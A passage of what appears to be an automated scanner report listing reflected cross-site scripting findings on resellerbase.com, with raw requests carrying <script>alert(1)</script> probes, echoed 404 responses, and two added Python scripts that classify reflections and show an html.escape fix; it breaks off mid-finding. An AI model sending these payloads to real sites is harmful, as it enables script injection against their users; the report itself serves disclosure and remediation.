Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/235ea85<script>alert(1)</script>bb20017e5f1fc3060/rating.php?id=23&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/235ea85<script>alert(1)</script>bb20017e5f1fc3060/rating.php?id=23&rating=5 was not found on this server.</p>
...[SNIP]...

2.1836. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c6e2f<script>alert(1)</script>9dab7d518d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23c6e2f<script>alert(1)</script>9dab7d518d6/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23c6e2f<script>alert(1)</script>9dab7d518d6/rating.php was not found on this server.</p>
...[SNIP]...

2.1837. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c5d2f<script>alert(1)</script>45fc397f845 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/rating.phpc5d2f<script>alert(1)</script>45fc397f845 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/rating.phpc5d2f<script>alert(1)</script>45fc397f845 was not found on this server.</p>
...[SNIP]...

2.1838. http://www.resellerbase.com/detail/23/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f7e69<script>alert(1)</script>22b2c8256a2db45db was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/23/rating.phpf7e69<script>alert(1)</script>22b2c8256a2db45db?id=23&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/rating.phpf7e69<script>alert(1)</script>22b2c8256a2db45db?id=23&rating=5 was not found on this server.</p>
...[SNIP]...

2.1839. http://www.resellerbase.com/detail/23/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b6db7<script>alert(1)</script>2397e5e06ab403f7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/23/rating.php/b6db7<script>alert(1)</script>2397e5e06ab403f7a?id=23&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/rating.php/b6db7<script>alert(1)</script>2397e5e06ab403f7a?id=23&rating=5 was not found on this server.</p>
...[SNIP]...

2.1840. http://www.resellerbase.com/detail/23/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7fcf1<script>alert(1)</script>58be5611895 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/rating.php?7fcf1<script>alert(1)</script>58be5611895=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/rating.php?7fcf1<script>alert(1)</script>58be5611895=1 was not found on this server.</p>
...[SNIP]...

2.1841. http://www.resellerbase.com/detail/23/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 634d4<script>alert(1)</script>e1845032298 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail634d4<script>alert(1)</script>e1845032298/23/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail634d4<script>alert(1)</script>e1845032298/23/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1842. http://www.resellerbase.com/detail/23/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0caa<script>alert(1)</script>ba92e4d73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23c0caa<script>alert(1)</script>ba92e4d73/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23c0caa<script>alert(1)</script>ba92e4d73/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1843. http://www.resellerbase.com/detail/23/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 191db<script>alert(1)</script>389db976dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/search.php191db<script>alert(1)</script>389db976dc?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/search.php191db<script>alert(1)</script>389db976dc?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1844. http://www.resellerbase.com/detail/23/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8846d<a>6959bebb13d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the reflection point is the same 404 template that echoes full <script> payloads unmodified for the REST URL parameters and an arbitrary parameter name on this path (2.1841 to 2.1843 and 2.1846), so confirm by hand whether a script payload in this parameter value is actually filtered before treating the finding as less exploitable.

Request

GET /detail/23/search.php?keyword=search...&Submit3=Search8846d<a>6959bebb13d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/search.php?keyword=search...&Submit3=Search8846d<a>6959bebb13d&opt=2 was not found on this server.</p>
...[SNIP]...
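Every finding in this run reflects through one place: the 404 page's line "The requested URL ... was not found on this server.", which echoes the raw request URI without HTML encoding. The title "Error 404 - Page Not..." together with the X-Powered-By: PHP header indicates an application-level 404 page rather than Apache's stock error document, which entity-encodes the URI it echoes. The Python script below is an added example and is not part of the XSS.CX report or of resellerbase.com's code. It takes request/response excerpts transcribed from findings 2.1830, 2.1831 and 2.1844 above (the SAMPLES table is constructed for this example), reproduces the scanner's Certain/Firm verdict from the response body alone, checks that every sample reflects through the same 404 template, and renders the same message through html.escape so that a retest classifies the payload as encoded. The function names are this example's own assumptions.

```python
"""Added example, not part of the XSS.CX report or the resellerbase.com code:
reproduce the scanner's reflected-XSS verdicts from the response body alone,
show that every finding reflects through one 404 template, and render the same
message safely. SAMPLES is constructed from exchanges reproduced in the report."""
import html
import re

# Constructed samples (finding id, payload as sent, <p> line from the 404 body),
# transcribed from findings 2.1830, 2.1831 and 2.1844 above. Not live data.
SAMPLES = [
    ("2.1830", "4c043<script>alert(1)</script>7ce810c0e4a",
     "<p>The requested URL /detail4c043<script>alert(1)</script>7ce810c0e4a"
     "/23/pinnaclecart-com.html was not found on this server.</p>"),
    ("2.1831", "91115<a>070576924f",
     "<p>The requested URL /detail/2391115<a>070576924f/pinnaclecart-com.html"
     " was not found on this server.</p>"),
    ("2.1844", "8846d<a>6959bebb13d",
     "<p>The requested URL /detail/23/search.php?keyword=search...&Submit3="
     "Search8846d<a>6959bebb13d&opt=2 was not found on this server.</p>"),
]

# The one sink every finding in this section shares: the 404 page's echo of
# the raw request URI.
SINK_RE = re.compile(
    r"<p>The requested URL (.*?) was not found on this server\.</p>", re.S)


def classify(payload: str, body: str) -> str:
    """Map a payload/response pair onto the scanner's confidence levels.

    certain : a payload carrying a <script> element came back byte-for-byte
    firm    : a harmless tag (<a>) came back intact, but no script element
              was demonstrated; the position needs a manual retest
    encoded : the payload is present only with < and > entity-encoded, so
              no tag can open; this is what a fixed handler should produce
    absent  : the payload was not reflected at all
    """
    if payload in body:
        return "certain" if "<script>" in payload.lower() else "firm"
    if html.escape(payload, quote=False) in body:
        return "encoded"
    return "absent"


def sink_text(body: str):
    """Return the URI echoed by the 404 template, or None if absent."""
    m = SINK_RE.search(body)
    return m.group(1) if m else None


def shared_sink(bodies) -> bool:
    """True when every response reflects through the same 404 template,
    i.e. the findings are one bug reported once per injection point."""
    return all(sink_text(b) is not None for b in bodies)


def safe_not_found(request_uri: str) -> str:
    """Hardened rendering of the same message: entity-encode the URI before
    it is interpolated into HTML (PHP equivalent: htmlspecialchars)."""
    return ("<p>The requested URL %s was not found on this server.</p>"
            % html.escape(request_uri, quote=True))


def audit(samples=SAMPLES) -> dict:
    """Verdict per finding id, e.g. {'2.1830': 'certain', '2.1831': 'firm'}."""
    return {fid: classify(payload, body) for fid, payload, body in samples}


if __name__ == "__main__":
    for fid, verdict in audit().items():
        print(fid, verdict)
    print("shared sink:", shared_sink([b for _, _, b in SAMPLES]))
    fixed = safe_not_found("/detail/23/" + SAMPLES[0][1])
    print("after fix:", classify(SAMPLES[0][1], fixed))
```

Because the sink is a single template, one change in the 404 handler (encode the URI once, at the point where it is written into HTML) closes every finding in this section at once; the per-parameter entries are the scanner enumerating injection points, not separate bugs. The "firm" verdicts are a reason to retest the position with a script payload by hand, not evidence that the position is filtered.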

2.1845. http://www.resellerbase.com/detail/23/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 8f74b<a>0bc28b2fe12 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the reflection point is the same 404 template that echoes full <script> payloads unmodified for the REST URL parameters and an arbitrary parameter name on this path (2.1841 to 2.1843 and 2.1846), so confirm by hand whether a script payload in the keyword value is actually filtered before treating the finding as less exploitable.

Request

GET /detail/23/search.php?keyword=search...8f74b<a>0bc28b2fe12&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/search.php?keyword=search...8f74b<a>0bc28b2fe12&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1846. http://www.resellerbase.com/detail/23/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3f42e<script>alert(1)</script>c1db037ab36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/23/search.php?keyword=search...&Submit3=Search&opt=2&3f42e<script>alert(1)</script>c1db037ab36=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/search.php?keyword=search...&Submit3=Search&opt=2&3f42e<script>alert(1)</script>c1db037ab36=1 was not found on this server.</p>
...[SNIP]...

2.1847. http://www.resellerbase.com/detail/23/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/23/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 38791<a>e2ec0b1dd96 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Note that the reflection point is the same 404 template that echoes full <script> payloads unmodified for the REST URL parameters and an arbitrary parameter name on this path (2.1841 to 2.1843 and 2.1846), so confirm by hand whether a script payload in the opt value is actually filtered before treating the finding as less exploitable.

Request

GET /detail/23/search.php?keyword=search...&Submit3=Search&opt=238791<a>e2ec0b1dd96 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/23/pinnaclecart-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/23/search.php?keyword=search...&Submit3=Search&opt=238791<a>e2ec0b1dd96 was not found on this server.</p>
...[SNIP]...

2.1848. http://www.resellerbase.com/detail/23/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0676<script>alert(1)</script>1336f838662 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild0676<script>alert(1)</script>1336f838662/23/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild0676<script>alert(1)</script>1336f838662/23/themes/ was not found on this server.</p>
...[SNIP]...
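The two reflections described so far (the <a>-only reflection at the top of this section and the unmodified <script> reflection in 2.1848) differ only in what came back between the two random hex markers the scanner wraps around its payload. The following Python script is an added example, not code from the XSS.CX report or from the scanner that produced it; it reproduces that classification offline. It extracts whatever sits between the prefix and suffix markers in a response body and reports whether the payload came back unmodified, HTML-entity-encoded, percent-encoded, altered, or not at all. The first sample body is the <p> line from the 2.1848 response; the other sample bodies, the reuse of that entry's marker values, and all function names are constructed for this example. The browser_path_encode helper approximates the percent-encoding a current browser applies to < and > before sending a URL. It is included as a caveat: the raw request shown in the report was sent by the scanner, and a PHP 404 handler that echoes $_SERVER['REQUEST_URI'] (which PHP leaves URL-encoded) would reflect %3Cscript%3E rather than <script> unless it decodes the value first; whether this host's handler decodes is not established by the report.

```python
"""Classify how a reflected-XSS probe comes back in an HTTP response body.

Added example; not code from the XSS.CX report or from the scanner that
produced it. Every sample body except REPORT_BODY is constructed.
"""
import html
import re
import secrets
from urllib.parse import quote, unquote

PAYLOAD = "<script>alert(1)</script>"

# Marker values taken from report entry 2.1848; reused for the constructed samples.
PREFIX, SUFFIX = "d0676", "1336f838662"

# The <p> line from the 2.1848 response body (the genuine reflection).
REPORT_BODY = (
    "<p>The requested URL /detaild0676<script>alert(1)</script>1336f838662"
    "/23/themes/ was not found on this server.</p>"
)


def make_probe(payload: str = PAYLOAD) -> tuple[str, str, str]:
    """Build a scanner-style probe: random hex prefix + payload + random hex suffix.

    The random markers let the checker locate the reflection even when the
    payload between them has been stripped or rewritten by a filter.
    """
    prefix = secrets.token_hex(3)[:5]    # five hex chars, like 'd0676'
    suffix = secrets.token_hex(6)[:11]   # eleven hex chars, like '1336f838662'
    return prefix, payload, suffix


def classify_reflection(body: str, prefix: str, payload: str, suffix: str) -> str:
    """Return how the payload came back between the markers.

    'unmodified'   raw payload echoed: the report's "echoed unmodified" case
    'html-encoded' < and > became &lt; and &gt;: harmless between tags
    'url-encoded'  %3C...%3E: exploitable only if the server decodes before echoing
    'modified'     markers present but payload altered (e.g. tags stripped)
    'absent'       markers not found in the body
    """
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    if m is None:
        return "absent"
    echoed = m.group(1)
    if echoed == payload:
        return "unmodified"
    if echoed == html.escape(payload):
        return "html-encoded"
    if "%" in echoed and unquote(echoed) == payload:
        return "url-encoded"
    return "modified"


def browser_path_encode(target: str) -> str:
    """Approximate what a current browser sends for a URL path and query:
    < and > are percent-encoded; / ? = & ( ) and unreserved characters pass through."""
    return quote(target, safe="/?=&()")


def sample_bodies() -> dict[str, str]:
    """REPORT_BODY plus constructed variants of the same 404 page."""
    tmpl = "<p>The requested URL /detail{}/23/themes/ was not found on this server.</p>"
    return {
        "report": REPORT_BODY,
        "escaped": tmpl.format(PREFIX + html.escape(PAYLOAD) + SUFFIX),
        "percent": tmpl.format(browser_path_encode(PREFIX + PAYLOAD + SUFFIX)),
        "stripped": tmpl.format(PREFIX + "alert(1)" + SUFFIX),
        "none": tmpl.format(""),
    }


def verdicts() -> dict[str, str]:
    """Verdict for each sample body, keyed by sample name."""
    return {name: classify_reflection(body, PREFIX, PAYLOAD, SUFFIX)
            for name, body in sample_bodies().items()}


if __name__ == "__main__":
    for name, verdict in verdicts().items():
        print(f"{name:9s} -> {verdict}")
```

Run the file to print a verdict for each sample. On an engagement, feed it the body of the response to a request carrying a probe from make_probe and treat anything other than 'unmodified' as needing the manual follow-up that the report's own note for the <a>-only case recommends; a 'url-encoded' verdict in particular means the finding is only exploitable from a browser if the server decodes the URL before echoing it.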

2.1849. http://www.resellerbase.com/detail/23/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/23/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2527e<script>alert(1)</script>3fe344ba4c7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/232527e<script>alert(1)</script>3fe344ba4c7/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
